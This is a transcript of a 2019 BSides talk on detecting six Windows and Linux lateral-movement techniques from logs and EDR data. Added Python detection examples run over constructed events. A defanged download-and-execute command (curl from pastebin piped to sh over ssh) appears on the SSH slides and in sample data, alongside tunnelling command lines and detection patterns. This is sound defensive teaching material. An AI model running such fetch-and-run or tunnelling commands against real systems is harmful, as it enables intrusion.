Spotting Lateral Movement - BSides Augusta 2019

Lateral movement is an integral part of how adversaries get into and move around networks. This functionality is now built into relatively inexpensive and widely available malware, in addition to the system-administration tooling that ships with operating systems. There is some good news: you CAN detect an adversary moving around your network with the proper telemetry and analysis. This session will arm defenders with techniques to detect six commonly used lateral movement methods using endpoint data.

Tony M Lambert

October 05, 2019

Transcript

  1. Spotting Lateral
    Movement
    Using Endpoint Data

  2. ▪ Find & detect adversaries using data
    ▪ Recovering system administrator
    ▪ Love to teach, hate to grade homework
    Tony Lambert
    Detection Engineer/Intel
    RED CANARY
    @ForensicITGuy
    $env:UserName

  3. (diagram-only slide, no text)

  4. What the admin sees...
    Malicious movement

  5. What’s endpoint data anyways?
    Lateral Movement Techniques
    ▪ Windows Admin Shares
    ▪ Windows Remote Management
    ▪ Remote Desktop Protocol
    ▪ Pass the Hash
    ▪ Exploitation of Remote Services
    ▪ Remote Services
    Overview

  6. Log Data
    Everything has logs!
    Many options
    System integration
    Too much data?
    Misconfigurations

  7. Endpoint Detection & Response
    Flight recorder
    Process metadata
    Happy medium
    Hard to manage
    No content
    Mostly for processes

  8. Live Forensics
    Full content
    Max visibility
    Hard to scale
    Human correlation
    Issues with ephemeral

  9. Windows Admin
    Shares

  10. ▪ Hidden network shares for admins
    ▪ Copy files & schedule execution
    ▪ ADMIN$ == %SystemRoot% == C:\Windows
    \\win10-pc\ADMIN$
    Windows Admin Shares

  11. Windows Admin Shares - Copy
    ▪ Logs
    ○ 5140 - Network Share Accessed
    ○ 5145 - Network Share Access Checked
    ○ 4624 - Account Logged On (Type 3)

  12. Windows Admin Shares - Service
    ▪ Logs
    ○ 7045 - New Service
    ▪ EDR
    ○ parent process == services.exe
    ○ path == System32 OR sysWOW64

  13. Windows Admin Shares - Both
    ▪ Live Forensics
    ○ New files in C:\Windows (NTFS Entry Number)
    ○ Services in Registry
    (HKLM\SYSTEM\CurrentControlSet\Services)

  14. Bonus! PsExec Clones
    ▪ Named Pipes (Sysmon Event ID 17)
    ○ PsExec - \\.\pipe\psexesvc
    ○ RemCom - \\.\pipe\remcom_comunication
    ○ PaExec - *PAExec*
    ○ CSExec - \\.\pipe\csexecsvc
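
The following is an added example (not code from the talk, Red Canary, or any of the tools named on the slides) that wires the cues from the Admin Shares slides and the PsExec-clone slide into one correlation: a Security 5140/5145 access to ADMIN$ followed within a short window by a System 7045 service install whose binary sits outside System32/SysWOW64, plus Sysmon Event ID 17 pipe names matched against the clone list. The events are constructed samples, the flattened field names (`ts`, `id`, `share`, `image_path`, `pipe_name`, `src_ip`) are my own representation of those events, and the five-minute window is an assumed tuning value. The "path outside System32/SysWOW64" reading of the slide's EDR cue is my interpretation: a binary pushed through ADMIN$ lands in C:\Windows itself, which is exactly where service binaries do not normally live.

```python
"""Added example: correlate admin-share access with service creation and
PsExec-clone named pipes on the receiving host.  Sample events below are
constructed; field names are a flattened form of the Windows events and
are an assumption of this example."""
from datetime import datetime, timedelta

# Pipe names from the PsExec-clone slide, matched case-insensitively as
# substrings so both "\\.\pipe\psexesvc" and Sysmon's "\PSEXESVC" hit.
PSEXEC_CLONE_PIPES = {
    "psexesvc": "PsExec",
    "remcom_comunication": "RemCom",
    "paexec": "PaExec",
    "csexecsvc": "CSExec",
}
SYSTEM_ROOT = "c:\\windows"
TRUSTED_SERVICE_DIRS = (SYSTEM_ROOT + "\\system32\\", SYSTEM_ROOT + "\\syswow64\\")


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def is_admin_share_access(event):
    """Security 5140/5145 whose share is ADMIN$ or a drive share such as C$."""
    if event["id"] not in (5140, 5145):
        return False
    share = event["share"].rsplit("\\", 1)[-1].upper()
    return share == "ADMIN$" or (len(share) == 2 and share[1] == "$")


def service_binary_is_suspicious(image_path):
    """True when a 7045 image path lies outside System32/SysWOW64.
    A binary copied through ADMIN$ lands in C:\\Windows itself (PSEXESVC.exe)."""
    path = image_path.lower().replace("%systemroot%", SYSTEM_ROOT).lstrip('"')
    return not path.startswith(TRUSTED_SERVICE_DIRS)


def psexec_clone_for_pipe(pipe_name):
    """Map a Sysmon Event ID 17 pipe name to a tool family, or None."""
    lower = pipe_name.lower()
    return next((tool for needle, tool in PSEXEC_CLONE_PIPES.items()
                 if needle in lower), None)


def correlate(events, window=timedelta(minutes=5)):
    """Return alert tuples.  Events may arrive out of order, so sort first."""
    alerts = []
    share_hits = []  # (timestamp, source IP) of recent admin-share access
    for ev in sorted(events, key=_ts):
        if is_admin_share_access(ev):
            share_hits.append((_ts(ev), ev.get("src_ip")))
        elif ev["id"] == 7045 and service_binary_is_suspicious(ev["image_path"]):
            recent = [hit for hit in share_hits if _ts(ev) - hit[0] <= window]
            kind = "service_after_admin_share" if recent else "service_outside_system32"
            alerts.append((kind, ev["service_name"], recent[-1][1] if recent else None))
        elif ev["id"] == 17:
            tool = psexec_clone_for_pipe(ev["pipe_name"])
            if tool:
                alerts.append(("psexec_clone_pipe", tool, ev["pipe_name"]))
    return alerts


# Constructed sample: a PsExec-style push to one host plus benign events.
SAMPLE_EVENTS = [
    {"ts": "2019-10-05T09:12:00", "id": 7045, "service_name": "WSearch",
     "image_path": "%SystemRoot%\\system32\\SearchIndexer.exe /Embedding"},
    {"ts": "2019-10-05T11:00:00", "id": 5145, "share": "\\\\*\\Public",
     "src_ip": "10.0.0.9", "user": "asmith"},
    {"ts": "2019-10-05T14:00:01", "id": 4624, "logon_type": 3,
     "user": "jdoe", "src_ip": "10.0.0.7"},
    {"ts": "2019-10-05T14:00:02", "id": 5145, "share": "\\\\*\\ADMIN$",
     "relative_target": "PSEXESVC.exe", "src_ip": "10.0.0.7", "user": "jdoe"},
    {"ts": "2019-10-05T14:00:03", "id": 7045, "service_name": "PSEXESVC",
     "image_path": "C:\\Windows\\PSEXESVC.exe"},
    {"ts": "2019-10-05T14:00:04", "id": 17, "pipe_name": "\\PSEXESVC",
     "image": "C:\\Windows\\PSEXESVC.exe"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The sequence matters more than any single event: a lone 7045 for a binary outside System32 is noisy on hosts where third-party agents install, but a 7045 a few seconds after an ADMIN$ write from a workstation is the admin-share technique end to end. The pipe check is independent of timing, since a renamed PsExec still creates the same pipe name.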

  15. Windows Remote
    Management

  16. Windows Remote Management
    ▪ Admin all the systems!
    ▪ WinRM configures, can also call WMI
    ▪ WinRS issues remote commands
    ▪ WMI does a little of everything
    ▪ PowerShell Remoting builds on previous tools

  17. WinRS
    ▪ Logs
    ○ ID 169 - User authenticating to WinRM service
    ○ ID 4624 - User Logged On (Logon Type 3)
    ▪ EDR
    ○ Receiver parent process == winrshost.exe
    ○ Sender process == winrs.exe -r:

  18. Windows Mgmt Instrumentation
    ▪ Logs
    ○ ID 5857 - WMI provider started (WMI-Activity/Operational log)
    ○ ID 4624 - User Logged On (Logon Type 3 & 5)
    ▪ EDR
    ○ Receiver parent process == wmiprvse.exe
    ○ Sender process == wmic.exe /node:

  19. PowerShell Remoting
    ▪ Logs
    ○ ID 4104 - Suspicious PS Script Block
    ○ ID 4624 - User Logged On (Logon Type 3)
    ▪ EDR
    ○ Receiver parent process == wsmprovhost.exe
    ○ Sender process == powershell.exe OR pwsh.exe
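
An added example, not code from the talk, that applies the EDR cues from the WinRS, WMI and PowerShell Remoting slides to process start events from both ends of a session: on the receiver, a child of winrshost.exe, wmiprvse.exe or wsmprovhost.exe; on the sender, winrs.exe with `-r:` or wmic.exe with `/node:`. The events are constructed and the field names (`host`, `user`, `image`, `parent_image`, `command_line`) are an assumption. The PowerShell sender rule goes beyond the slide, which only names powershell.exe and pwsh.exe: matching remoting cmdlets with `-ComputerName` on the command line is my own heuristic and misses sessions built from a script file.

```python
"""Added example: spot both ends of a WinRS / WMI / PowerShell Remoting
session from process start events.  Sample events are constructed; field
names (host, user, image, parent_image, command_line) are an assumption."""
import re

# Receiver side (from the slides): the service host that spawns whatever the
# remote user executed.
RECEIVER_PARENTS = {
    "winrshost.exe": "WinRS",
    "wmiprvse.exe": "WMI",
    "wsmprovhost.exe": "PowerShell Remoting",
}

# Sender side: client image plus the switch that names the remote target.
# The PowerShell rule is an assumed heuristic, not from the slides.
SENDER_RULES = [
    ("WinRS", {"winrs.exe"}, re.compile(r"-r:\s*\"?(?P<target>[^\s\"]+)", re.I)),
    ("WMI", {"wmic.exe"}, re.compile(r"/node:\s*\"?(?P<target>[^\s\"]+)", re.I)),
    ("PowerShell Remoting", {"powershell.exe", "pwsh.exe"},
     re.compile(r"(?:Invoke-Command|Enter-PSSession|New-PSSession).*?"
                r"-ComputerName\s+\"?(?P<target>[^\s\"]+)", re.I)),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return ("receiver", tool, child image), ("sender", tool, target) or None."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if parent in RECEIVER_PARENTS:
        return ("receiver", RECEIVER_PARENTS[parent], image)
    for tool, images, pattern in SENDER_RULES:
        if image in images:
            match = pattern.search(cmd)
            if match:
                return ("sender", tool, match.group("target"))
    return None


def find_remote_management(events):
    """Tag every event that looks like one side of a remote-management session."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((ev["host"], ev["user"]) + verdict)
    return hits


SAMPLE_EVENTS = [  # constructed: jdoe on WS01 reaching FS01 three different ways
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "wmic /node:\"FS01\" os get caption"},
    {"host": "FS01", "user": "jdoe", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "command_line": "cmd /c hostname"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\winrs.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "winrs -r:FS01 ipconfig /all"},
    {"host": "FS01", "user": "jdoe", "image": "C:\\Windows\\System32\\ipconfig.exe",
     "parent_image": "C:\\Windows\\System32\\winrshost.exe",
     "command_line": "ipconfig /all"},
    {"host": "WS01", "user": "jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -Command \"Invoke-Command -ComputerName FS01 -ScriptBlock { whoami }\""},
    {"host": "FS01", "user": "jdoe", "image": "C:\\Windows\\System32\\whoami.exe",
     "parent_image": "C:\\Windows\\System32\\wsmprovhost.exe",
     "command_line": "whoami"},
    # Benign: a local WMI query without /node and an ordinary desktop process.
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "wmic os get caption"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in find_remote_management(SAMPLE_EVENTS):
        print(hit)
```

Sender and receiver hits carry the same user and the target name, so pairing a `sender` record on WS01 with a `receiver` record on FS01 a moment later is a simple join on (user, target host); receiver-side hits are the more reliable of the two because an attacker can use any client tool but cannot choose which service host spawns the command.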

  20. Windows Remote Management
    ▪ Live Forensics
    ○ Relies heavily on mature logs and process auditing
    ○ Process execution artifacts (Prefetch, etc…)
    ○ PowerShell transcripts, ConsoleHost_history.txt

  21. Remote Desktop
    Management

  22. Remote Desktop Management
    ▪ Admin with a GUI
    ▪ Shares clipboard, printers, disks, etc…
    ▪ Often used for a desktop experience

  23. Remote Desktop Management
    ▪ Logs
    ○ ID 1149 - Successful RDP Remote Connection
    ○ ID 4624 - User Logged On (Logon Type 10 or 7)
    ▪ EDR
    ○ Telltale processes == rdpclip.exe
    ○ Sender process == mstsc.exe

  24. Remote Desktop Mgmt - Activity
    ▪ EDR
    ○ Parent processes == explorer.exe, cmd.exe, etc.
    ▪ Live Forensics
    ○ Prefetch parsing
    ○ User activity forensics like local logon

  25. Remote Desktop Mgmt - Tunnelling
    ▪ EDR
    ○ plink.exe AND cmdline includes 127.0.0.1:3389
    ○ netsh.exe AND cmdline includes connectp AND 3389
    ▪ Live Forensics
    ○ HKCU\SYSTEM\CurrentControlSet\Services\PortProxy
    ○ Artifacts of plink.exe execution
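
An added example, not code from the talk, that covers the three Remote Desktop slides together: 4624 events with Logon Type 10 or 7, the rdpclip.exe and mstsc.exe process cues, and the plink/netsh command-line cues for tunnelled RDP. Both the Security events and the process events are constructed, and the flattened field names are an assumption. The `/v:` switch used to pull the target out of an mstsc.exe command line is a real mstsc option; everything else about the sample command lines is made up.

```python
"""Added example: RDP cues from the Remote Desktop slides applied to
constructed Security 4624 events and process start events.  Field names
are a flattened representation and an assumption of this example."""
import re

RDP_LOGON_TYPES = {10: "RemoteInteractive", 7: "Unlock/Reconnect"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rdp_logons(security_events):
    """4624 with Logon Type 10 (new RDP session) or 7 (session unlock/reconnect)."""
    return [(ev["host"], ev["user"], ev.get("src_ip"), RDP_LOGON_TYPES[ev["logon_type"]])
            for ev in security_events
            if ev["id"] == 4624 and ev["logon_type"] in RDP_LOGON_TYPES]


def rdp_process_indicators(process_events):
    """EDR cues: rdpclip.exe on the receiver, mstsc.exe on the sender (its /v:
    switch names the target), and plink/netsh command lines forwarding 3389."""
    hits = []
    for ev in process_events:
        image = _basename(ev["image"])
        cmd = ev.get("command_line", "")
        low = cmd.lower()
        if image == "rdpclip.exe":
            hits.append((ev["host"], "rdp_session_active", ev["user"]))
        elif image == "mstsc.exe":
            target = re.search(r"/v:\s*(\S+)", cmd, re.I)
            hits.append((ev["host"], "rdp_client", target.group(1) if target else "?"))
        elif image == "plink.exe" and "127.0.0.1:3389" in low:
            hits.append((ev["host"], "rdp_tunnel_plink", cmd))
        elif image == "netsh.exe" and "connectp" in low and "3389" in low:
            hits.append((ev["host"], "rdp_tunnel_portproxy", cmd))
    return hits


def report(security_events, process_events):
    """Group findings per host so logon and process context are read together."""
    per_host = {}
    for host, user, src, kind in rdp_logons(security_events):
        per_host.setdefault(host, []).append(f"logon {kind} {user} from {src}")
    for host, kind, detail in rdp_process_indicators(process_events):
        per_host.setdefault(host, []).append(f"{kind}: {detail}")
    return per_host


SECURITY_EVENTS = [  # constructed
    {"host": "FS01", "id": 4624, "logon_type": 10, "user": "jdoe", "src_ip": "10.0.0.7"},
    {"host": "FS01", "id": 4624, "logon_type": 3, "user": "svc_backup", "src_ip": "10.0.0.9"},
    {"host": "WS02", "id": 4624, "logon_type": 7, "user": "jdoe", "src_ip": "10.0.0.7"},
]
PROCESS_EVENTS = [  # constructed
    {"host": "FS01", "user": "jdoe", "image": "C:\\Windows\\System32\\rdpclip.exe",
     "command_line": "rdpclip"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\mstsc.exe",
     "command_line": "mstsc.exe /v:FS01"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Tools\\plink.exe",
     "command_line": "plink.exe -N -R 8443:127.0.0.1:3389 relay.example.invalid"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\netsh.exe",
     "command_line": "netsh interface portproxy add v4tov4 listenport=8080 "
                     "connectport=3389 connectaddress=10.0.0.12"},
    {"host": "WS01", "user": "jdoe", "image": "C:\\Windows\\System32\\netsh.exe",
     "command_line": "netsh advfirewall show allprofiles"},
]

if __name__ == "__main__":
    for host, findings in report(SECURITY_EVENTS, PROCESS_EVENTS).items():
        print(host, findings)
```

Logon Type 10 on the receiver with a matching mstsc.exe on the sender is the normal shape of an RDP session; a tunnel indicator on a host that never shows a Type 10 logon of its own is the case worth pulling Prefetch and the PortProxy registry data for, since the RDP traffic is arriving from the loopback address rather than the real client.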

  26. Pass the Hash

  27. Pass the Hash
    ▪ Authentication using NTLM hashes
    ▪ No cleartext password
    ▪ Mitigate with Win10 Credential Guard
    ▪ Mitigate with Domain Protected Users group

  28. Pass the Hash
    ▪ Logs
    ○ ID 4672 - Special Privileges Logon
    ○ ID 4624 - User Logged On (Logon Type 3 or 9)
    ○ ID 10 - Sysmon (ProcessAccess lsass.exe)
    ○ Not a domain logon
    ○ Not the ANONYMOUS LOGON account
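
An added example, not code from the talk, that turns the log cues on this slide into a triage filter: 4624 with Logon Type 3 or 9, a target domain that is not the Active Directory domain (so not a domain logon), a target user that is not ANONYMOUS LOGON, joined to 4672 on the same logon ID, plus Sysmon Event ID 10 for processes opening lsass.exe. Requiring the NTLM authentication package on Type 3 is my own tightening, since a Kerberos network logon cannot be a hash replay; Type 9 is kept regardless of package, as the slide lists it. The events, the domain name CORP and the lsass reader allow-list are all constructed, and the flattened field names are an assumption.

```python
"""Added example: triage filter for pass-the-hash using the cues on the slide
(4624 logon type 3 or 9, local rather than domain account, not ANONYMOUS LOGON,
4672 for the same logon ID, Sysmon 10 access to lsass.exe).  Sample events are
constructed; field names are flattened event data and an assumption."""

ANONYMOUS = "ANONYMOUS LOGON"


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_pth_candidate(ev, domain):
    """Apply the slide's 4624 cues.  Type 3 must be NTLM (own tightening):
    a Kerberos network logon cannot be a hash replay.  Type 9 (NewCredentials)
    is kept regardless of package, as the slide lists it."""
    if ev["id"] != 4624 or ev["logon_type"] not in (3, 9):
        return False
    if ev["target_user"].upper() == ANONYMOUS:
        return False
    if ev["target_domain"].upper() == domain.upper():
        return False  # ordinary domain logon
    if ev["logon_type"] == 3 and ev["auth_package"].upper() != "NTLM":
        return False
    return True


def pass_the_hash_alerts(events, domain):
    """Return (host, user, logon_type, privileged, src_ip) for candidate logons,
    marking those whose logon ID also appears in a 4672 special-privileges event."""
    privileged_ids = {(ev["host"], ev["logon_id"]) for ev in events if ev["id"] == 4672}
    return [(ev["host"], ev["target_user"], ev["logon_type"],
             (ev["host"], ev["logon_id"]) in privileged_ids, ev.get("src_ip"))
            for ev in events if is_pth_candidate(ev, domain)]


def lsass_access_alerts(sysmon_events, allowed_sources):
    """Sysmon Event ID 10 where a process not on the allow-list opened lsass.exe."""
    return [(ev["host"], _basename(ev["source_image"]), ev["granted_access"])
            for ev in sysmon_events
            if ev["id"] == 10 and _basename(ev["target_image"]) == "lsass.exe"
            and _basename(ev["source_image"]) not in allowed_sources]


SECURITY_EVENTS = [  # constructed; the domain is CORP
    {"host": "FS01", "id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "target_user": "Administrator", "target_domain": "FS01",
     "logon_id": "0x3e7a1", "src_ip": "10.0.0.7"},
    {"host": "FS01", "id": 4672, "logon_id": "0x3e7a1"},
    {"host": "FS01", "id": 4624, "logon_type": 3, "auth_package": "Kerberos",
     "target_user": "jdoe", "target_domain": "CORP",
     "logon_id": "0x3e7b0", "src_ip": "10.0.0.7"},
    {"host": "FS01", "id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "target_user": "ANONYMOUS LOGON", "target_domain": "NT AUTHORITY",
     "logon_id": "0x3e7c2", "src_ip": "10.0.0.9"},
    {"host": "WS01", "id": 4624, "logon_type": 9, "auth_package": "Negotiate",
     "target_user": "jdoe", "target_domain": "WS01",
     "logon_id": "0x5120", "src_ip": "-"},
    {"host": "WS01", "id": 4624, "logon_type": 2, "auth_package": "Kerberos",
     "target_user": "jdoe", "target_domain": "CORP",
     "logon_id": "0x5001", "src_ip": "-"},
]
SYSMON_EVENTS = [  # constructed
    {"host": "WS01", "id": 10, "source_image": "C:\\Windows\\System32\\csrss.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1000"},
    {"host": "WS01", "id": 10,
     "source_image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
]
# Constructed allow-list; build the real one from your own baseline.
ALLOWED_LSASS_READERS = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

if __name__ == "__main__":
    for alert in pass_the_hash_alerts(SECURITY_EVENTS, "CORP"):
        print("PtH candidate:", alert)
    for alert in lsass_access_alerts(SYSMON_EVENTS, ALLOWED_LSASS_READERS):
        print("lsass access:", alert)
```

This is a filter, not a verdict: a local administrator logging on over the network with NTLM looks identical whether the password or only its hash was supplied, which is why the slide's EDR line says the sensor "doesn't know the difference". The value is in narrowing the 4624 stream to privileged local-account network logons that merit pulling the source host's logs and checking it for credential-theft tooling.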

  29. Pass the Hash
    ▪ EDR
    ○ Doesn’t know the difference
    ▪ Live Forensics
    ○ Grab the local logs
    ○ Credential theft tools and material on disk

  30. Exploitation of
    Remote Services

  31. Exploitation of Remote Services
    ▪ On Windows, primarily Server Message Block (SMB)
    ▪ “ETERNALBLUE” or maybe “BLUEKEEP” in the future

  32. Exploitation of Remote Services
    ▪ Logs
    ○ Depending on exploit, sparse logging
    ○ Code injection (if you have Sysmon)
    ▪ EDR
    ○ Abnormal parent/child relationships
    ○ lsass.exe, spoolsv.exe spawning child processes
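
An added example, not code from the talk, for the EDR cue on this slide: rebuild process lineage from start events and report every chain that descends from lsass.exe or spoolsv.exe, so the alert shows the whole tree (for instance `lsass.exe > cmd.exe > powershell.exe`) rather than a single parent/child pair. The events are constructed and the field names (`host`, `pid`, `ppid`, `image`, `parent_image`) are an assumption; keying on the child's `parent_image` means the parent's own start event, which usually predates the sensor, is not needed.

```python
"""Added example: reconstruct process lineage from start events and report
descendants of processes that should never spawn children, the cue on the
Exploitation of Remote Services slide.  Sample events are constructed and
field names (host, pid, ppid, image, parent_image) are an assumption."""
from collections import defaultdict

# Service processes named on the slide as exploitation targets that have
# no business creating child processes.
SENSITIVE_PARENTS = {"lsass.exe", "spoolsv.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def abnormal_lineages(events):
    """Return (host, chain) for every leaf process descended from a sensitive
    parent, e.g. ("FS01", "lsass.exe > cmd.exe > powershell.exe")."""
    by_pid = {(ev["host"], ev["pid"]): ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        children[(ev["host"], ev["ppid"])].append((ev["host"], ev["pid"]))

    alerts = []

    def walk(key, chain, seen):
        if key in seen:
            return  # guard against PID reuse producing a loop
        seen = seen | {key}
        ev = by_pid[key]
        chain = chain + [_basename(ev["image"])]
        kids = children.get(key, [])
        if not kids:
            alerts.append((ev["host"], " > ".join(chain)))
        for kid in kids:
            walk(kid, chain, seen)

    for ev in events:
        parent = _basename(ev["parent_image"])
        if parent in SENSITIVE_PARENTS:
            walk((ev["host"], ev["pid"]), [parent], set())
    return alerts


SAMPLE_EVENTS = [  # constructed
    {"host": "FS01", "pid": 4100, "ppid": 700,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\System32\\lsass.exe"},
    {"host": "FS01", "pid": 4120, "ppid": 4100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe"},
    {"host": "PRN01", "pid": 1204, "ppid": 612,
     "image": "C:\\Windows\\System32\\spoolsv.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe"},
    {"host": "PRN01", "pid": 3300, "ppid": 1204,
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "parent_image": "C:\\Windows\\System32\\spoolsv.exe"},
    {"host": "WS01", "pid": 2200, "ppid": 1800,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for alert in abnormal_lineages(SAMPLE_EVENTS):
        print(alert)
```

Note that spoolsv.exe being started by services.exe is not flagged; only processes below it are. A production rule keeps an allow-list built from your own baseline for the few children these services legitimately create, and the full chain in the alert is what lets an analyst tell a driver helper from a shell.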

  33. Exploitation of Remote Services
    ▪ Live forensics
    ○ Evidence of code injection (memory forensics)
    ○ Exploit code left on system

  34. Remote Services

  35. Remote Services
    ▪ On Windows, SMB
    ▪ On macOS & Linux, SSH & VNC
    ▪ Using services designed for remote connections
    ▪ Not always associated with remote administration

  36. Remote Services
    ▪ Logs
    ○ Depends on service
    ○ SSH - /var/log/secure (RHEL) /var/log/auth.log (Debian)
    ▪ EDR
    ○ Child processes of SSHD and VNC daemons
    ○ “ssh” commands with suspicious command lines

  37. Remote Services
    ssh … [email protected] 'curl hxxps://pastebin.com/payload | sh'
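
An added example, not code from the talk, covering the two Remote Services detection slides: it parses sshd authentication lines in the format written to /var/log/secure (RHEL) and /var/log/auth.log (Debian), then correlates successful logons with children of sshd whose command line pipes a download into a shell, the shape of the command on the slide, and flags the same pattern on the sending side's ssh client invocation. The log lines and process events are constructed (including the defanged hxxps URL, kept as on the slide), and the process field names are an assumption.

```python
"""Added example: parse sshd authentication lines from /var/log/secure or
/var/log/auth.log and correlate them with suspicious commands run under
sshd, the cues on the Remote Services slides.  Log lines and process events
are constructed; process field names are an assumption."""
import re
from collections import Counter

SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")

# Download-and-execute in one command line, the pattern on the ssh slide.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash)\b")


def parse_sshd_line(line):
    """Return a dict for auth success/failure lines, None for anything else."""
    m = SSHD_LINE.match(line)
    return m.groupdict() if m else None


def summarize_logons(lines):
    """Accepted logons as (host, user, ip) and failure counts per (ip, user)."""
    accepted, failures = [], Counter()
    for rec in filter(None, map(parse_sshd_line, lines)):
        if rec["result"] == "Accepted":
            accepted.append((rec["host"], rec["user"], rec["ip"]))
        else:
            failures[(rec["ip"], rec["user"])] += 1
    return accepted, failures


def suspicious_command(cmd):
    return bool(PIPE_TO_SHELL.search(cmd))


def suspicious_sessions(lines, process_events):
    """Receiver side: children of sshd with a pipe-to-shell command line, joined
    to the Accepted logon for that host/user.  Sender side: ssh client
    invocations carrying the same pattern."""
    accepted, _ = summarize_logons(lines)
    src_for = {(h, u): ip for h, u, ip in accepted}
    hits = []
    for ev in process_events:
        if not suspicious_command(ev["command_line"]):
            continue
        parent = ev["parent_image"].rsplit("/", 1)[-1]
        image = ev["image"].rsplit("/", 1)[-1]
        if parent == "sshd":
            src = src_for.get((ev["host"], ev["user"]), "unknown")
            hits.append((ev["host"], ev["user"], src, ev["command_line"]))
        elif image == "ssh":
            hits.append((ev["host"], ev["user"], "client", ev["command_line"]))
    return hits


AUTH_LOG = [  # constructed lines in the auth.log / secure format
    "Oct  5 14:02:11 web01 sshd[2311]: Accepted publickey for deploy from 10.0.0.7 port 51234 ssh2: RSA SHA256:constructed",
    "Oct  5 14:02:11 web01 sshd[2311]: pam_unix(sshd:session): session opened for user deploy by (uid=0)",
    "Oct  5 14:03:40 web01 sshd[2390]: Failed password for root from 203.0.113.9 port 40110 ssh2",
    "Oct  5 14:03:41 web01 sshd[2390]: Failed password for root from 203.0.113.9 port 40110 ssh2",
    "Oct  5 14:03:45 web01 sshd[2391]: Failed password for invalid user admin from 203.0.113.9 port 40112 ssh2",
]
PROCESS_EVENTS = [  # constructed
    {"host": "web01", "user": "deploy", "image": "/bin/sh", "parent_image": "/usr/sbin/sshd",
     "command_line": "sh -c 'curl hxxps://pastebin.com/payload | sh'"},
    {"host": "web01", "user": "deploy", "image": "/bin/bash", "parent_image": "/usr/sbin/sshd",
     "command_line": "bash -c 'uptime'"},
    {"host": "ws01", "user": "jdoe", "image": "/usr/bin/ssh", "parent_image": "/bin/bash",
     "command_line": "ssh deploy@web01 'curl hxxps://pastebin.com/payload | sh'"},
]

if __name__ == "__main__":
    print(summarize_logons(AUTH_LOG))
    for hit in suspicious_sessions(AUTH_LOG, PROCESS_EVENTS):
        print(hit)
```

The failure counter is there because the same log answers the question the slide's "depends on service" line raises: brute-force noise from one source IP against many usernames reads very differently from a single accepted key logon followed by a download-and-execute command, and only the latter is lateral movement worth chasing into shell history and filesystem artifacts.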

  38. Remote Services
    ▪ Live Forensics
    ○ Recovering logs
    ○ Filesystem artifacts correlated with logon
    ○ Shell history

  39. FEEDBACK
    Q & A
    Special thanks to:
    Michael Gough @hackerhurricane
    Carlos Perez @darkoperator
    JP-CERT @jpcert_en
    Matt Graeber @mattifestation
    MITRE ATT&CK @MITREattack
    SANS DFIR @sansforensics
    Matthew Dunwoody @matthewdunwoody
    FireEye @fireeye
    Jonathon Poling @JPoForenso
    STEALTHbits @STEALTHbits
